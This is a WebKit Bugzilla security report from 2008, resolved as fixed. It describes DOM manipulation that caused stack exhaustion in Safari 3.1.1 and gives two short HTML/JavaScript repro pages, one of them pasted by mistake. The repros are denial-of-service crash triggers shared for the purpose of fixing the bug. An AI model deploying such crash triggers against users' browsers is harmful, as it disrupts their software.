WebKit Bugzilla
RESOLVED FIXED
19514
DOM modification causes stack exhaustion (exact cause unknown)
https://bugs.webkit.org/show_bug.cgi?id=19514
Berend-Jan Wever
Reported
2008-06-12 04:16:13 PDT
I found that the following javascript causes a stack exhaustion:

    <BODY onload="go()"><SCRIPT>
    function go() {
      var oEmbed=document.createElement('embed');
      document.body.appendChild(oEmbed);
      var oEmbed2 = oEmbed.cloneNode();
      oEmbed2.appendChild(document.body.parentElement);
      var oA = document.createElement('a');
      document.title = '';
      oA.innerHTML = '<x><html></html>';
    }
    </SCRIPT></BODY>

Tested with Safari 3.1.1. Marked as security, I'm not sure if you treat DoS as a security issue, so erring on the safe side.
Berend-Jan Wever
Comment 1
2008-06-12 04:22:27 PDT
(In reply to comment #0)
OOOPS. I copy+pasted the wrong code (see bug 19516). This is the real repro code for this case:

    <BODY onload="go()"><SCRIPT>
    function go() {
      oStrike=document.createElement('b');
      oStrike.innerHTML='<object><table></table><colGroup></colGroup></object>';
      document.body.parentElement.appendChild(oStrike);
    }
    </SCRIPT></BODY>
Berend-Jan Wever
Comment 2
2008-06-13 06:29:01 PDT
Changing priority and security flag
Mark Rowe (bdash)
Comment 3
2008-06-13 14:52:30 PDT
<rdar://problem/6007109>
mitz
Comment 4
2008-07-05 01:29:12 PDT
I cannot reproduce in r35011. I think this bug was fixed along with bug 15919 in <http://trac.webkit.org/changeset/34692>.